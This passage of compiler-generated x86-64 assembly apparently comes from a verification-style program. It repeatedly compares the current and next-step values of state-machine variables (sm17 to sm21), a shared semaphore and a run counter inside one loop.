LBB1_553: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm17_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_555
## %bb.554: ## in Loop: Header=BB1_70 Depth=1
movq _sm17_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_556
LBB1_555: ## in Loop: Header=BB1_70 Depth=1
movq _sm17_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm17_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_556: ## in Loop: Header=BB1_70 Depth=1
movq _sm17_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_558
## %bb.557: ## in Loop: Header=BB1_70 Depth=1
movq _sm17_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm17_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_558: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm17_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_561
## %bb.559: ## in Loop: Header=BB1_70 Depth=1
movq _sm17_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_561
## %bb.560: ## in Loop: Header=BB1_70 Depth=1
movq _sm17_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm17_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_561: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm17_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_565
## %bb.562: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_565
## %bb.563: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_565
## %bb.564: ## in Loop: Header=BB1_70 Depth=1
movq _sm17_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_565: ## in Loop: Header=BB1_70 Depth=1
movq _sm17_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm17_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_570
## %bb.566: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_569
## %bb.567: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_569
## %bb.568: ## in Loop: Header=BB1_70 Depth=1
movq _sm17_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_570
LBB1_569: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $17, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_570: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_573
## %bb.571: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $17, (%rax)
jne LBB1_573
## %bb.572: ## in Loop: Header=BB1_70 Depth=1
movq _sm17_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm17_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_573: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_577
## %bb.574: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm17_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_577
## %bb.575: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $17, (%rax)
jne LBB1_577
## %bb.576: ## in Loop: Header=BB1_70 Depth=1
movq _sm17_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_577: ## in Loop: Header=BB1_70 Depth=1
movq _sm18_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_579
## %bb.578: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm18_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm18_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_581
LBB1_579: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm18_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_581
## %bb.580: ## in Loop: Header=BB1_70 Depth=1
movq _sm18_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_581: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm18_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_583
## %bb.582: ## in Loop: Header=BB1_70 Depth=1
movq _sm18_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_584
LBB1_583: ## in Loop: Header=BB1_70 Depth=1
movq _sm18_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm18_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_584: ## in Loop: Header=BB1_70 Depth=1
movq _sm18_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_586
## %bb.585: ## in Loop: Header=BB1_70 Depth=1
movq _sm18_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm18_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_586: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm18_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_589
## %bb.587: ## in Loop: Header=BB1_70 Depth=1
movq _sm18_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_589
## %bb.588: ## in Loop: Header=BB1_70 Depth=1
movq _sm18_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm18_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_589: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm18_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_593
## %bb.590: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_593
## %bb.591: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_593
## %bb.592: ## in Loop: Header=BB1_70 Depth=1
movq _sm18_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_593: ## in Loop: Header=BB1_70 Depth=1
movq _sm18_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm18_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_598
## %bb.594: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_597
## %bb.595: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_597
## %bb.596: ## in Loop: Header=BB1_70 Depth=1
movq _sm18_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_598
LBB1_597: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $18, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_598: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_601
## %bb.599: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $18, (%rax)
jne LBB1_601
## %bb.600: ## in Loop: Header=BB1_70 Depth=1
movq _sm18_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm18_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_601: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_605
## %bb.602: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm18_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_605
## %bb.603: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $18, (%rax)
jne LBB1_605
## %bb.604: ## in Loop: Header=BB1_70 Depth=1
movq _sm18_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_605: ## in Loop: Header=BB1_70 Depth=1
movq _sm19_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_607
## %bb.606: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm19_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm19_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_609
LBB1_607: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm19_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_609
## %bb.608: ## in Loop: Header=BB1_70 Depth=1
movq _sm19_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_609: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm19_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_611
## %bb.610: ## in Loop: Header=BB1_70 Depth=1
movq _sm19_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_612
LBB1_611: ## in Loop: Header=BB1_70 Depth=1
movq _sm19_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm19_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_612: ## in Loop: Header=BB1_70 Depth=1
movq _sm19_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_614
## %bb.613: ## in Loop: Header=BB1_70 Depth=1
movq _sm19_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm19_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_614: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm19_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_617
## %bb.615: ## in Loop: Header=BB1_70 Depth=1
movq _sm19_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_617
## %bb.616: ## in Loop: Header=BB1_70 Depth=1
movq _sm19_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm19_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_617: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm19_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_621
## %bb.618: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_621
## %bb.619: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_621
## %bb.620: ## in Loop: Header=BB1_70 Depth=1
movq _sm19_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_621: ## in Loop: Header=BB1_70 Depth=1
movq _sm19_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm19_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_626
## %bb.622: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_625
## %bb.623: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_625
## %bb.624: ## in Loop: Header=BB1_70 Depth=1
movq _sm19_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_626
LBB1_625: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $19, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_626: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_629
## %bb.627: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $19, (%rax)
jne LBB1_629
## %bb.628: ## in Loop: Header=BB1_70 Depth=1
movq _sm19_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm19_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_629: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_633
## %bb.630: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm19_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_633
## %bb.631: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $19, (%rax)
jne LBB1_633
## %bb.632: ## in Loop: Header=BB1_70 Depth=1
movq _sm19_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_633: ## in Loop: Header=BB1_70 Depth=1
movq _sm20_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_635
## %bb.634: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm20_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm20_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_637
LBB1_635: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm20_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_637
## %bb.636: ## in Loop: Header=BB1_70 Depth=1
movq _sm20_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_637: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm20_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_639
## %bb.638: ## in Loop: Header=BB1_70 Depth=1
movq _sm20_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_640
LBB1_639: ## in Loop: Header=BB1_70 Depth=1
movq _sm20_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm20_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_640: ## in Loop: Header=BB1_70 Depth=1
movq _sm20_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_642
## %bb.641: ## in Loop: Header=BB1_70 Depth=1
movq _sm20_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm20_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_642: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm20_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_645
## %bb.643: ## in Loop: Header=BB1_70 Depth=1
movq _sm20_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_645
## %bb.644: ## in Loop: Header=BB1_70 Depth=1
movq _sm20_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm20_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_645: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm20_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_649
## %bb.646: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_649
## %bb.647: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_649
## %bb.648: ## in Loop: Header=BB1_70 Depth=1
movq _sm20_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_649: ## in Loop: Header=BB1_70 Depth=1
movq _sm20_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm20_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_654
## %bb.650: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_653
## %bb.651: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_653
## %bb.652: ## in Loop: Header=BB1_70 Depth=1
movq _sm20_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_654
LBB1_653: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $20, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_654: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_657
## %bb.655: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $20, (%rax)
jne LBB1_657
## %bb.656: ## in Loop: Header=BB1_70 Depth=1
movq _sm20_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm20_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_657: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_661
## %bb.658: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm20_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_661
## %bb.659: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $20, (%rax)
jne LBB1_661
## %bb.660: ## in Loop: Header=BB1_70 Depth=1
movq _sm20_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_661: ## in Loop: Header=BB1_70 Depth=1
movq _sm21_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_663
## %bb.662: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm21_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm21_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_665
LBB1_663: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm21_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_665
## %bb.664: ## in Loop: Header=BB1_70 Depth=1
movq _sm21_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -13(%rbp) ## 1-byte Spill
je LBB1_692
LBB1_665: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm21_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_667
## %bb.666: ## in Loop: Header=BB1_70 Depth=1
movq _sm21_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_668
LBB1_667: ## in Loop: Header=BB1_70 Depth=1
movq _sm21_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm21_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -13(%rbp) ## 1-byte Spill
jne LBB1_692
LBB1_668: ## in Loop: Header=BB1_70 Depth=1
movq _sm21_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_670
## %bb.669: ## in Loop: Header=BB1_70 Depth=1
movq _sm21_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm21_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -13(%rbp) ## 1-byte Spill
jne LBB1_692
LBB1_670: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm21_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_673
## %bb.671: ## in Loop: Header=BB1_70 Depth=1
movq _sm21_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_673
## %bb.672: ## in Loop: Header=BB1_70 Depth=1
movq _sm21_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm21_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -13(%rbp) ## 1-byte Spill
jg LBB1_692
LBB1_673: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm21_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_677
## %bb.674: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_677
## %bb.675: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_677
## %bb.676: ## in Loop: Header=BB1_70 Depth=1
movq _sm21_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -13(%rbp) ## 1-byte Spill
je LBB1_692
LBB1_677: ## in Loop: Header=BB1_70 Depth=1
movq _sm21_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm21_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_682
## %bb.678: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_681
## %bb.679: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_681
## %bb.680: ## in Loop: Header=BB1_70 Depth=1
movq _sm21_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_682
LBB1_681: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $21, (%rcx)
movb %al, -13(%rbp) ## 1-byte Spill
jne LBB1_692
